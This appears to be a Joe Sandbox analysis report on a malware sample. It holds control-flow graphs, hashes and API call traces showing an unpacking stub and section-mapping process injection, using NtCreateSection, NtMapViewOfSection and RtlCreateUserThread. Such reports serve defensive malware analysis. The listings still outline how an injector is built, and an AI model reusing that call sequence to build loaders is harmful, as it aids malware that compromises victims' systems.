                                                                                            • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                            • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 319 621706-62171f 320 621721-621723 319->320 321 621725 320->321 322 62172a-621736 CreateToolhelp32Snapshot 320->322 321->322 323 621746-621753 Module32First 322->323 324 621738-62173e 322->324 325 621755-621756 call 6213c5 323->325 326 62175c-621764 323->326 324->323 331 621740-621744 324->331 329 62175b 325->329 329->326 331->320 331->323
                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0062172E
                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 0062174E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114641854.000000000060F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0060F000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_60f000_9VgIkx4su0.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                            • String ID:
                                                                                            • API String ID: 3833638111-0
                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                            • Instruction ID: 0e14d6e04ef9909f5c947dfc742519d00e64aa9065b34efef07b025033945e67
                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                            • Instruction Fuzzy Hash: DCF06236200B246BD7203BF5A88DBAA76E9AF9A765F100528F642955C0DA70E8454E61

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 209003c-2090047 1 2090049 0->1 2 209004c-2090263 call 2090a3f call 2090e0f call 2090d90 VirtualAlloc 0->2 1->2 17 209028b-2090292 2->17 18 2090265-2090289 call 2090a69 2->18 20 20902a1-20902b0 17->20 21 20902ce-20903c2 VirtualProtect call 2090cce call 2090ce7 18->21 20->21 22 20902b2-20902cc 20->22 29 20903d1-20903e0 21->29 22->20 30 2090439-20904b8 VirtualFree 29->30 31 20903e2-2090437 call 2090ce7 29->31 33 20904be-20904cd 30->33 34 20905f4-20905fe 30->34 31->29 38 20904d3-20904dd 33->38 35 209077f-2090789 34->35 36 2090604-209060d 34->36 39 209078b-20907a3 35->39 40 20907a6-20907b0 35->40 36->35 41 2090613-2090637 36->41 38->34 43 20904e3-2090505 38->43 39->40 44 209086e-20908be LoadLibraryA 40->44 45 20907b6-20907cb 40->45 46 209063e-2090648 41->46 51 2090517-2090520 43->51 52 2090507-2090515 43->52 50 20908c7-20908f9 44->50 48 20907d2-20907d5 45->48 46->35 49 209064e-209065a 46->49 53 2090824-2090833 48->53 54 20907d7-20907e0 48->54 49->35 55 2090660-209066a 49->55 56 20908fb-2090901 50->56 57 2090902-209091d 50->57 58 2090526-2090547 51->58 52->58 62 2090839-209083c 53->62 59 20907e2 54->59 60 20907e4-2090822 54->60 61 209067a-2090689 55->61 56->57 63 209054d-2090550 58->63 59->53 60->48 64 209068f-20906b2 61->64 65 2090750-209077a 61->65 62->44 66 209083e-2090847 62->66 68 20905e0-20905ef 63->68 69 2090556-209056b 63->69 70 20906ef-20906fc 64->70 71 20906b4-20906ed 64->71 65->46 72 2090849 66->72 73 209084b-209086c 66->73 68->38 74 209056d 69->74 75 209056f-209057a 69->75 76 209074b 70->76 77 20906fe-2090748 70->77 71->70 72->44 73->62 74->68 78 209059b-20905bb 75->78 79 209057c-2090599 75->79 76->61 77->76 84 20905bd-20905db 78->84 79->84 84->63
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0209024D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114759693.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Offset: 02090000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2090000_9VgIkx4su0.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID: cess$kernel32.dll
                                                                                            • API String ID: 4275171209-1230238691
                                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                            • Instruction ID: 571f571e7d084fd000c4ea48e79ccf4338d86c462d87e49f6c0699987f3fdcf7
                                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                            • Instruction Fuzzy Hash: D4526A74A01229DFDBA4CF58C984BADBBB1BF09314F1480D9E54EAB351DB30AA85DF14

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 332 2090e0f-2090e24 SetErrorMode * 2 333 2090e2b-2090e2c 332->333 334 2090e26 332->334 334->333
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,02090223,?,?), ref: 02090E19
                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,02090223,?,?), ref: 02090E1E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114759693.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Offset: 02090000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2090000_9VgIkx4su0.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                            • Instruction ID: 10129a3fe212e682639f71971b88a6d26267ce46d9308158a6e3ab39f2dfc045
                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                            • Instruction Fuzzy Hash: 5DD0123514522877DB412A94DC09BCD7B5DDF05B66F008011FB0DD9080C770954046E5

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                            • String ID:
                                                                                            • API String ID: 1885482327-0
                                                                                            • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                            • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                            • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                            • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                            • String ID:
                                                                                            • API String ID: 1885482327-0
                                                                                            • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                            • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                            • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                            • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                            • String ID:
                                                                                            • API String ID: 1885482327-0
                                                                                            • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                            • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                            • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                            • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                            • String ID:
                                                                                            • API String ID: 1885482327-0
                                                                                            • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                            • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                            • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                            • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 444 6213c5-6213ff call 6216d8 447 621401-621434 VirtualAlloc call 621452 444->447 448 62144d 444->448 450 621439-62144b 447->450 448->448 450->448
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00621416
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114641854.000000000060F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0060F000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_60f000_9VgIkx4su0.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                            • Instruction ID: a69f55f606376043e2b387c080955ed2affb2f59ee0a18a80be647a32b0a9953
                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                            • Instruction Fuzzy Hash: 8E113C79A00208EFDB01DF98C985E98BBF5AF18750F1580A4F9489B362D371EA50DF80

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                                                                            APIs
                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd
                                                                                            Similarity
                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                            • String ID:
                                                                                            • API String ID: 1885482327-0
                                                                                            • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                            • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                            • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                            • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114759693.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Offset: 02090000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2090000_9VgIkx4su0.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .$GetProcAddress.$l
                                                                                            • API String ID: 0-2784972518
                                                                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                            • Instruction ID: 8745802ab7d9cb4e2d3629555f7fc1262fed085cc3831b38a7b97a25a892d7da
                                                                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                            • Instruction Fuzzy Hash: 303149B6901709DFDB11CF99C880AAEBBF6FF48324F14404AD842A7250D771EA45DBA4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8b629cad718851529a8349badf854aa4f42902f4158d62fe99d564dbe5f1e4d1
                                                                                            • Instruction ID: d4c5b2d713ab9232080496078af059369c5345e186722ee5903dd3db8614e93b
                                                                                            • Opcode Fuzzy Hash: 8b629cad718851529a8349badf854aa4f42902f4158d62fe99d564dbe5f1e4d1
                                                                                            • Instruction Fuzzy Hash: 434131A181D2C24EDB435E3408A54E2BF79A96B32231C01FFD081EA1C7E2380B07939A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bd713e8a9ffb35993257ca06bb1ca9cf03b0909bce816e3c168a85f7237ff4a9
                                                                                            • Instruction ID: 47d85a717b2f9eb1e037dbaf55b436ab29ce309417f93d286f8d159decdfda18
                                                                                            • Opcode Fuzzy Hash: bd713e8a9ffb35993257ca06bb1ca9cf03b0909bce816e3c168a85f7237ff4a9
                                                                                            • Instruction Fuzzy Hash: 681101A1D1D2829BDF5B1E2108655767F6C6E7331772800FFD042BA2D2E23D5B02A26F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8235a342c0a5ccfb7a676b72f8706d5939bc8c2cb4e96ca567b58c971c6cfde2
                                                                                            • Instruction ID: 44dbed29d4116881d315b966fbacf1cf40a73d3247e8d5490da27da81908206f
                                                                                            • Opcode Fuzzy Hash: 8235a342c0a5ccfb7a676b72f8706d5939bc8c2cb4e96ca567b58c971c6cfde2
                                                                                            • Instruction Fuzzy Hash: 091120A1D1C2825BDF9B1E204C645B27F6C6A7332371800FFE402BA2D6E23D1B03925E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f11a235e0e08faed31d233c350fe522c88a0f226e8326adf6e177ce42ec05621
                                                                                            • Instruction ID: 6cc5313a22b02943346cb09be328e63b116041f9455492dba296d6b6c8d47a80
                                                                                            • Opcode Fuzzy Hash: f11a235e0e08faed31d233c350fe522c88a0f226e8326adf6e177ce42ec05621
                                                                                            • Instruction Fuzzy Hash: 0111E0A1C1D2829BDF5A2E2108648767F6C6A7731772800FFD042FA2D6E23D5B03A15F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9ec03d413cbbfde9ae04b67bfcc6c031395faee012b42a8efe698a5ecb0e7cee
                                                                                            • Instruction ID: 83c2e45a663ff97a83121d71df7fde14c7d1be506299b7fe0adcc4aca9f65d16
                                                                                            • Opcode Fuzzy Hash: 9ec03d413cbbfde9ae04b67bfcc6c031395faee012b42a8efe698a5ecb0e7cee
                                                                                            • Instruction Fuzzy Hash: 3211CBA1C1D2825BDFAA1E2108544B67F6CAA7771771400FFD402BA2D6E23D5B02929E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114641854.000000000060F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0060F000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_60f000_9VgIkx4su0.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                            • Instruction ID: 3640d06e3431e45d951b569c0f0407e1203b08f0a609e0755369330c68f11b42
                                                                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                            • Instruction Fuzzy Hash: 4C11A0723405109FD754CE55EC81EA673EAEB99360B298055ED04CB306DA75EC82CB60
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2113627890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_9VgIkx4su0.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e274102659cc5964db6623cf4447b3957c7ecae9963d781930d0ebff3212451b
                                                                                            • Instruction ID: 18a3bc8234d562e7f0c7d25340e1ec3d72d942eb246f5034c2dedc7c4f371e85
                                                                                            • Opcode Fuzzy Hash: e274102659cc5964db6623cf4447b3957c7ecae9963d781930d0ebff3212451b
                                                                                            • Instruction Fuzzy Hash: 3611E191D1C2820BDFA62E2048545B67F6C5A7335771840FFD401F62D6F13D1F02825A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2114759693.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Offset: 02090000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2090000_9VgIkx4su0.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                            • Instruction ID: 51e27f711baa0beac550456bf3a7a8221260ae1a9e6dd3e2d78941d8acd67c85
                                                                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                            • Instruction Fuzzy Hash: 2201D676A117048FDF22CF24C804BAA33FAFB86216F4544B5D90BD7281E774A941EB90

                                                                                            Execution Graph

                                                                                            Execution Coverage:7.5%
                                                                                            Dynamic/Decrypted Code Coverage:40.7%
                                                                                            Signature Coverage:0%
                                                                                            Total number of Nodes:118
                                                                                            Total number of Limit Nodes:4
                                                                                            execution_graph 3505 402e40 3507 402e37 3505->3507 3508 402edf 3507->3508 3509 4018e6 3507->3509 3510 4018f5 3509->3510 3511 40192e Sleep 3510->3511 3512 401949 3511->3512 3514 40195a 3512->3514 3515 401514 3512->3515 3514->3508 3516 401524 3515->3516 3517 4015c4 NtDuplicateObject 3516->3517 3522 4016e0 3516->3522 3518 4015e1 NtCreateSection 3517->3518 3517->3522 3519 401661 NtCreateSection 3518->3519 3520 401607 NtMapViewOfSection 3518->3520 3521 40168d 3519->3521 3519->3522 3520->3519 3523 40162a NtMapViewOfSection 3520->3523 3521->3522 3524 401697 NtMapViewOfSection 3521->3524 3522->3514 3523->3519 3525 401648 3523->3525 3524->3522 3526 4016be NtMapViewOfSection 3524->3526 3525->3519 3526->3522 3622 401542 3623 40153b 3622->3623 3624 4015c4 NtDuplicateObject 3623->3624 3629 4016e0 3623->3629 3625 4015e1 NtCreateSection 3624->3625 3624->3629 3626 401661 NtCreateSection 3625->3626 3627 401607 NtMapViewOfSection 3625->3627 3628 40168d 3626->3628 3626->3629 3627->3626 3630 40162a NtMapViewOfSection 3627->3630 3628->3629 3631 401697 NtMapViewOfSection 3628->3631 3630->3626 3632 401648 3630->3632 3631->3629 3633 4016be NtMapViewOfSection 3631->3633 3632->3626 3633->3629 3527 5df29e 3528 5df2ad 3527->3528 3531 5dfa3e 3528->3531 3534 5dfa59 3531->3534 3532 5dfa62 CreateToolhelp32Snapshot 3533 5dfa7e Module32First 3532->3533 3532->3534 3535 5dfa8d 3533->3535 3536 5df2b6 3533->3536 3534->3532 3534->3533 3538 5df6fd 3535->3538 3539 5df728 3538->3539 3540 5df739 VirtualAlloc 3539->3540 3541 5df771 3539->3541 3540->3541 3565 2090001 3566 2090005 3565->3566 3571 209092b GetPEB 3566->3571 3568 2090030 3573 209003c 3568->3573 3572 2090972 3571->3572 3572->3568 3574 2090049 3573->3574 3575 2090e0f 2 API calls 3574->3575 3576 2090223 3575->3576 3577 2090d90 GetPEB 3576->3577 3578 2090238 VirtualAlloc 3577->3578 3579 2090265 3578->3579 3580 20902ce VirtualProtect 3579->3580 3582 209030b 3580->3582 3581 2090439 VirtualFree 3585 20904be LoadLibraryA 3581->3585 3582->3581 3584 20908c7 3585->3584 3586 2090005 3587 209092b GetPEB 3586->3587 3588 2090030 3587->3588 3589 209003c 7 API calls 3588->3589 3590 2090038 3589->3590 3681 402dd0 3683 402ddc 3681->3683 3682 4018e6 8 API calls 3684 402edf 3682->3684 3683->3682 3683->3684 3603 4018f1 3604 4018f6 3603->3604 3605 40192e Sleep 3604->3605 3606 401949 3605->3606 3607 401514 7 API calls 3606->3607 3608 40195a 3606->3608 3607->3608 3542 209003c 3543 2090049 3542->3543 3555 2090e0f SetErrorMode SetErrorMode 3543->3555 3548 2090265 3549 20902ce VirtualProtect 3548->3549 3551 209030b 3549->3551 3550 2090439 VirtualFree 3554 20904be LoadLibraryA 3550->3554 3551->3550 3553 20908c7 3554->3553 3556 2090223 3555->3556 3557 2090d90 3556->3557 3558 2090dad 3557->3558 3559 2090dbb GetPEB 3558->3559 3560 2090238 VirtualAlloc 3558->3560 3559->3560 3560->3548 3668 401915 3669 40191a 3668->3669 3670 4018c6 3668->3670 3671 40192e Sleep 3669->3671 3672 401949 3671->3672 3673 401514 7 API calls 3672->3673 3674 40195a 3672->3674 3673->3674 3561 402f97 3562 4030ee 3561->3562 3563 402fc1 3561->3563 3563->3562 3564 40307c RtlCreateUserThread NtTerminateProcess 3563->3564 3564->3562 3658 402d7b 3661 402d38 3658->3661 3659 402dc7 3660 4018e6 8 API calls 3660->3659 3661->3658 3661->3659 3661->3660 3609 4014fe 3610 401506 3609->3610 3611 401531 3609->3611 3612 4015c4 NtDuplicateObject 3611->3612 3617 4016e0 3611->3617 3613 4015e1 NtCreateSection 3612->3613 3612->3617 3614 401661 NtCreateSection 3613->3614 3615 401607 NtMapViewOfSection 3613->3615 3616 40168d 3614->3616 3614->3617 3615->3614 3618 40162a NtMapViewOfSection 3615->3618 3616->3617 3619 401697 NtMapViewOfSection 3616->3619 3618->3614 3620 401648 3618->3620 3619->3617 3621 4016be NtMapViewOfSection 3619->3621 3620->3614 3621->3617

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 106 4018a5-4018b7 100->106 104 401595-4015be 101->104 105 401896 101->105 104->105 115 4015c4-4015db NtDuplicateObject 104->115 105->106 111 4018c5 106->111 112 4018bc-4018e3 call 401193 106->112 111->112 115->105 117 4015e1-401605 NtCreateSection 115->117 119 401661-401687 NtCreateSection 117->119 120 401607-401628 NtMapViewOfSection 117->120 119->105 121 40168d-401691 119->121 120->119 123 40162a-401646 NtMapViewOfSection 120->123 121->105 124 401697-4016b8 NtMapViewOfSection 121->124 123->119 126 401648-40165e 123->126 124->105 127 4016be-4016da NtMapViewOfSection 124->127 126->119 127->105 130 4016e0 call 4016e5 127->130
                                                                                            APIs
                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
